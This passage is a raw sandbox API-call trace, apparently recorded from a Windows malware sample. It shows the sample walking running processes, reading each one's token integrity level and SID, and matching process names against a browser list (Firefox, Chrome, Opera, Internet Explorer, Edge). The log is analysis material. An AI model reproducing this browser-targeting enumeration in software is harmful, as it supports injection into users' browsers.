TokenHandle=0xfcfabc*=0x340) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.271] GetLastError () returned 0x7a [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.271] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.271] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.271] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0249.271] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0249.271] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0249.271] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0249.271] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0249.271] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0249.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0249.271] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.271] GetLastError () returned 0x7a [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.271] CloseHandle (hObject=0x340) returned 1 [0249.271] CloseHandle (hObject=0x548) returned 1 [0249.271] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.271] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.272] GetLastError () returned 0x7a [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.272] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.272] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.272] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0249.272] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0249.272] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0249.272] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0249.272] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0249.272] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0249.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0249.272] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.272] GetLastError () returned 0x7a [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.272] CloseHandle (hObject=0x340) returned 1 [0249.272] CloseHandle (hObject=0x548) returned 1 [0249.272] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.272] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.272] GetLastError () returned 0x7a [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.272] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.272] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.272] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0249.272] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0249.272] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0249.272] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0249.272] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0249.272] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0249.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0249.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0249.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0249.272] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.272] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.273] GetLastError () returned 0x7a [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.273] CloseHandle (hObject=0x340) returned 1 [0249.273] CloseHandle (hObject=0x548) returned 1 [0249.273] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.273] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.273] GetLastError () returned 0x7a [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.273] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.273] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.273] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.273] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.273] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0249.273] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.273] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.273] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0249.273] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.273] GetLastError () returned 0x7a [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.273] CloseHandle (hObject=0x340) returned 1 [0249.273] CloseHandle (hObject=0x548) returned 1 [0249.273] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.273] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.273] GetLastError () returned 0x7a [0249.273] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.273] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.273] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.273] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0249.274] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0249.274] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0249.274] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0249.274] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0249.274] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0249.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0249.274] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.274] GetLastError () returned 0x7a [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.274] CloseHandle (hObject=0x340) returned 1 [0249.274] CloseHandle (hObject=0x548) returned 1 [0249.274] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.274] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.274] GetLastError () returned 0x7a [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.274] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.274] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.274] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.274] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.274] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.274] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.274] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.274] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0249.274] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.274] GetLastError () returned 0x7a [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.274] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.274] CloseHandle (hObject=0x340) returned 1 [0249.274] CloseHandle (hObject=0x548) returned 1 [0249.274] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.274] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.275] GetLastError () returned 0x7a [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.275] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.275] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.275] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0249.275] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0249.275] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0249.275] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0249.275] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0249.275] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0249.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0249.275] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.275] GetLastError () returned 0x7a [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.275] CloseHandle (hObject=0x340) returned 1 [0249.275] CloseHandle (hObject=0x548) returned 1 [0249.275] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.275] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.275] GetLastError () returned 0x7a [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.275] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.275] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.275] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.275] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0249.275] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.275] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.275] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.275] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0249.275] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.275] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.275] GetLastError () returned 0x7a [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.276] CloseHandle (hObject=0x340) returned 1 [0249.276] CloseHandle (hObject=0x548) returned 1 [0249.276] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.276] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.276] GetLastError () returned 0x7a [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.276] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.276] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.276] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0249.276] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0249.276] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0249.276] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0249.276] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0249.276] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0249.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0249.276] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.276] GetLastError () returned 0x7a [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.276] CloseHandle (hObject=0x340) returned 1 [0249.276] CloseHandle (hObject=0x548) returned 1 [0249.276] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.276] OpenProcessToken (in: ProcessHandle=0x548, 